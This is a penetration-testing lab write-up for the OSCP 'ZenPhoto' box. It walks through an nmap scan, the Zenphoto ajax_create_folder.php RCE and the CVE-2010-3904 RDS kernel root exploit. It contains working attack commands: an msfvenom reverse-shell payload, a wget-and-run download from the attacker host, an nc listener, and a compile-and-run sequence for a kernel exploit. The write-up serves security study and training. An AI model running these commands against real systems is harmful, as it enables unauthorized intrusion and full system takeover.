OSCP lab -- ZenPhoto

Key points: Zenphoto <= 1.4.1.4 unauthenticated RCE ('ajax_create_folder.php', CVE-2011-4825) for a www-data shell, then CVE-2010-3904 (RDS socket) kernel exploit for root

1. nmap scan

## Full TCP port scan with version detection and default scripts (save it with -oX as well and it can be fed straight into `searchsploit --nmap`). OpenSSH 5.3p1 "3ubuntu7" and Apache 2.2.14 in the output are the Ubuntu 10.04 packages, so expect a 2.6.32-era kernel in the privilege-escalation phase.
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.158.41 -sV -sC  -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-11 21:14 EDT
Warning: 192.168.158.41 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.158.41
Host is up (0.14s latency).
Not shown: 64872 closed tcp ports (reset), 659 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)
|_  2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)
23/tcp   open  telnet?
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2011-11-08T07:15:46
|_Not valid after:  2021-11-05T07:15:46
|_ssl-date: 2024-04-12T05:17:31+00:00; +4h00m03s from scanner time.
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
3306/tcp open  mysql   MySQL (unauthorized)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 4h00m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.39 seconds
                                                                 

2. user priv

## Directory scan (dirsearch finds /test/, which turns out to be the Zenphoto install):
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.41/       
[21:32:25] 200 -   75B  - /index.html                                         
[21:32:25] 200 -   75B  - /index                                              
[21:33:30] 301 -  315B  - /test  ->  http://192.168.158.41/test/              
[21:33:30] 200 -    5KB - /test/                                              
                                                                              
Task Completed

###########################
## Search exploit-db for Zenphoto; the 1.4.1.4 'ajax_create_folder.php' RCE (18083.php, CVE-2011-4825) is the one used here. It is a PHP script, so Kali needs a php CLI to run it.
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit zenphoto         
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution                 | php/webapps/18083.php
ZenPhoto 1.4.10 - Local File Inclusion                                            | php/webapps/38841.txt
ZenPhoto 1.4.11 - Remote File Inclusion                                           | php/webapps/39571.txt
ZenPhoto 1.4.3.3 - Multiple Vulnerabilities                                       | php/webapps/22524.txt
ZenPhoto 1.4.8 - Multiple Vulnerabilities                                         | php/webapps/37602.txt
ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities            | php/webapps/14359.html
ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery)        | php/webapps/9166.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------------------------------------- ---------------------------------
 Paper Title                                                                      |  Path
---------------------------------------------------------------------------------- ---------------------------------
MOAUB #26 - Zenphoto - Config Update / Command Execution                          | docs/english/15115-moaub-26---ze
---------------------------------------------------------------------------------- ---------------------------------
                                                                                                                    
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m php/webapps/18083.php
  Exploit: ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/18083
     Path: /usr/share/exploitdb/exploits/php/webapps/18083.php
    Codes: OSVDB-76928, CVE-2011-4825
 Verified: True
File Type: PHP script, ASCII text
Copied to: /root/Desktop/18083.php

###############
## Reverse shell: build an ELF reverse shell with msfvenom that calls back to the Kali host on port 80
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.45.195 LPORT=80 -f elf -o shell80.elf


#####
## Serve the payload over HTTP from Kali (the GET line below confirms the target pulled it)
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80                                                                                             
192.168.158.41 - - [11/Apr/2024 22:45:53] "GET /shell80.elf HTTP/1.0" 200 -


#################
## Run the exploit: it takes only the host and the Zenphoto web path, no credentials. It drops into an interactive zenphoto-shell# that runs commands as www-data with the plugin's inc/ directory as the working directory (visible in the prompt later). Use it to fetch, chmod and execute the payload.
┌──(root㉿kali)-[~/Desktop]
└─# php 18083.php 192.168.158.41 /test/

+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+

zenphoto-shell# wget http://192.168.45.195/shell80.elf -O /tmp/shell80.elf

zenphoto-shell# chmod +x /tmp/shell80.elf

zenphoto-shell# /tmp/shell80.elf

####################
## Listener on Kali: catch the shell, then upgrade it to a full TTY (the target has python2 only; `which python3` prints nothing)
                                                                                                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 80
listening on [any] 80 ...
192.168.158.41: inverse host lookup failed: Unknown host
connect to [192.168.45.195] from (UNKNOWN) [192.168.158.41] 58824
which python
/usr/bin/python
which python3
whoami
www-data
python -c 'import pty;pty.spawn("bash")'
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ ^Z
zsh: suspended  nc -lvvp 80
                                                                                                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo ; fg
[1]  + continued  nc -lvvp 80
                             reset
reset: unknown terminal type unknown
Terminal type? screen  
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ whoami
www-data
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ 
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ cd /tmp
local.txt
www-data@offsecsrv:/home$ cat local.txt 
ce3882c4821fc58fa462e2c5138dba9e


########################
## Note on the TTY upgrade above: `reset` asked for the terminal type because TERM is not set inside the spawned shell. After `fg`, run `export TERM=xterm` (and `stty rows <n> cols <m>` to match the local terminal) and the prompt goes away.

3. root priv

3.1 CVE-2021-4034 (PwnKit) and CVE-2016-5195 (Dirty COW): privilege escalation failed

## linux-exploit-suggester output (run on the target). The bracketed tags mark the entries matching the detected release, Ubuntu 10.04 with a 2.6.32 kernel: CVE-2016-5195 "dirtycow 2" and CVE-2010-3904.
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                                            
[+] [CVE-2016-5195] dirtycow 2                                                                                                                                                                

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,[ ubuntu=10.04{kernel:2.6.32-21-generic} ],ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2010-3904] rds

   Details: http://www.securityfocus.com/archive/1/514379
   Exposure: highly probable
   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main


###################
## Dirty COW attempts (40839.c, /etc/passwd method) did not yield root on this box, so move on to the RDS candidate
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit dirty 
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                                                      | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                                                      | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)                                          | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)                                             | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                                                                | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)                                          | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                                                                 | linux/local/40611.c
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)                                                                                         | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL                                                                             | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion                                                                                   | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion                                                                                    | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                                                                                         | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                                                                                         | linux/local/46362.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Paper Title                                                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
DirtyTooth: Extracting VCARD data from Bluetooth iOS profiles                                                                                               | docs/english/42430-dirtytooth-ex
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
                                                                                                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m linux/local/40839.c  

  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40839
     Path: /usr/share/exploitdb/exploits/linux/local/40839.c
    Codes: CVE-2016-5195
 Verified: True
File Type: C source, ASCII text
Copied to: /root/Desktop/40839.c




3.2 CVE-2010-3904 [Linux privilege escalation succeeded]

## References:
https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/zenphoto
https://infosecjm.medium.com/proving-grounds-zenphoto-676016681184
## PoC (Dan Rosenberg's linux-rds-exploit.c, mirrored as exploit-db 15285):
https://www.exploit-db.com/exploits/15285
## Why it works: CVE-2010-3904 is a missing address check in rds_page_copy_user() in the RDS socket code (present since 2.6.30, fixed in 2.6.36). An unprivileged process that can open a PF_RDS socket can make the kernel copy data to or from an arbitrary address through sendmsg()/recvmsg(), i.e. write kernel memory. The exploit resolves the symbols listed in its output from /proc/kallsyms, points security_ops at default_security_ops, replaces the ptrace_traceme hook (cap_ptrace_traceme) with a userland function that calls commit_creds(prepare_kernel_cred(0)), triggers it with ptrace(PTRACE_TRACEME), restores the pointer and spawns a root shell. The rds module only has to be present, not loaded: socket() autoloads it.

## Compiling on the target failed, so compile on Kali, upload the binary and run it on the target
## Steps, on Kali: first install the 32-bit headers and libraries (gcc-multilib)
┌──(root㉿kali)-[~/Desktop]
└─# sudo apt-get install gcc-multilib -y

##########
## -static avoids depending on the target's old glibc; -m32 because the target runs a 32-bit kernel (the 0xc0xxxxxx symbol addresses in the exploit output below are the i386 kernel mapping).
## The implicit-declaration warnings come from missing <arpa/inet.h> and <sys/wait.h> includes and are harmless here; gcc 14 and later turn them into errors, so add -Wno-error=implicit-function-declaration or the two includes.
┌──(root㉿kali)-[~/Desktop]
└─# gcc 15285.c -o 15285 -m32 -static   
15285.c: In function ‘prep_sock’:
15285.c:66:32: warning: implicit declaration of function ‘inet_addr’ [-Wimplicit-function-declaration]
   66 |         addr.sin_addr.s_addr = inet_addr("127.0.0.1");
      |                                ^~~~~~~~~
15285.c: In function ‘write_to_mem’:
15285.c:136:17: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration]
  136 |                 wait(NULL);
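Pre-flight checks for this build-and-run step, as an added example that is not from the write-up or from the exploit itself. It picks the gcc flags from the target's `uname -m`, checks that the five symbols the exploit resolves are readable from a kallsyms-format file (missing symbols or kptr_restrict zeroing them means the exploit cannot work), and checks that the rds module exists under the kernel's module tree. It goes beyond this box by also handling x86_64. The kallsyms lines in the demo are constructed from the addresses the exploit printed on this target; the function names, the module path and the non-i686 branches are my assumptions.

```shell
#!/usr/bin/env bash
# Pre-flight checks for the CVE-2010-3904 build-and-run step. Added example,
# not part of the original write-up or of the exploit. The kallsyms lines in
# the demo at the bottom are constructed from the addresses the exploit
# printed on this target; the module path is the standard one (assumption).

# 1. Pick gcc flags from the target's `uname -m`. The exploit must match the
#    target's word size, and -static avoids linking against a 2024 glibc that a
#    2010-era Ubuntu cannot load.
gcc_flags_for_arch() {
    case "$1" in
        i386|i486|i586|i686) echo "-m32 -static" ;;
        x86_64)              echo "-m64 -static" ;;
        *) echo "unsupported arch: $1" >&2; return 1 ;;
    esac
}

# 2. The exploit resolves these five symbols from /proc/kallsyms. It fails if
#    one is missing or if kptr_restrict (kernels >= 2.6.37) zeroes them out.
RDS_REQUIRED_SYMS="security_ops default_security_ops cap_ptrace_traceme commit_creds prepare_kernel_cred"

# Print "name 0xaddr" per symbol from a kallsyms-format file ($1, default
# /proc/kallsyms); return 1 if any symbol is missing or hidden as all zeros.
# kallsyms lines are "address type name [module]", so the name is field 3.
check_kallsyms() {
    local file="${1:-/proc/kallsyms}" name addr rc=0
    for name in $RDS_REQUIRED_SYMS; do
        addr=$(awk -v s="$name" '$3 == s { print $1; exit }' "$file")
        case "$addr" in
            "")            echo "MISSING $name"; rc=1 ;;
            *[1-9a-fA-F]*) echo "$name 0x$addr" ;;
            *)             echo "HIDDEN  $name (kptr_restrict)"; rc=1 ;;
        esac
    done
    return $rc
}

# 3. PF_RDS sockets need the rds module. It does not have to be loaded, only
#    present, because socket() autoloads net-pf-21. $1 overrides the module
#    root (default: the running kernel's).
rds_module_present() {
    local modroot="${1:-/lib/modules/$(uname -r)}"
    [ -f "$modroot/kernel/net/rds/rds.ko" ]
}

# --- demo on constructed data (on the target you would pass no arguments) ---
demo_kallsyms=$(mktemp)
cat > "$demo_kallsyms" <<'EOF'
c016dcc0 T commit_creds
c016e000 T prepare_kernel_cred
c02f3dc0 T cap_ptrace_traceme
c0773300 d default_security_ops
c08c8c2c b security_ops
EOF
echo "flags: $(gcc_flags_for_arch i686)"
if check_kallsyms "$demo_kallsyms"; then
    echo "symbols resolvable: exploit can proceed"
else
    echo "symbols unusable: exploit will not work on this kernel"
fi
rm -f "$demo_kallsyms"
```

On the target, `check_kallsyms` with no argument reads the live /proc/kallsyms and `rds_module_present` looks under the running kernel's module directory; run both before spending time on the build.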

###############################
## On the target: fetch the static binary, make it executable and run it. The banner below repeats because write_to_mem() fork()s for each kernel write and every exiting child flushes its inherited copy of the stdout buffer; the exploit ran once.
www-data@offsecsrv:/tmp/1$ wget http://192.168.45.195/15285
--2024-04-12 04:06:22--  http://192.168.45.195/15285
Connecting to 192.168.45.195:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854100 (834K) [application/octet-stream]
Saving to: `15285'

100%[======================================>] 854,100      447K/s   in 1.9s    

2024-04-12 04:06:30 (447 KB/s) - `15285' saved [854100/854100]

www-data@offsecsrv:/tmp/1$ ls
15285
www-data@offsecsrv:/tmp/1$ chmod +x 15285
www-data@offsecsrv:/tmp/1$ ./15285   
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
# whoami
root
# 





4. Summary:

## Foothold: Zenphoto 1.4.1.4 'ajax_create_folder.php' RCE (exploit-db 18083, CVE-2011-4825), no credentials needed, shell as www-data
## Root: CVE-2010-3904 (RDS socket) kernel exploit, compiled static 32-bit on Kali because building on the target failed; Dirty COW and PwnKit did not work here
## CVE-2010-3904 privilege escalation reference:
https://infosecjm.medium.com/proving-grounds-zenphoto-676016681184
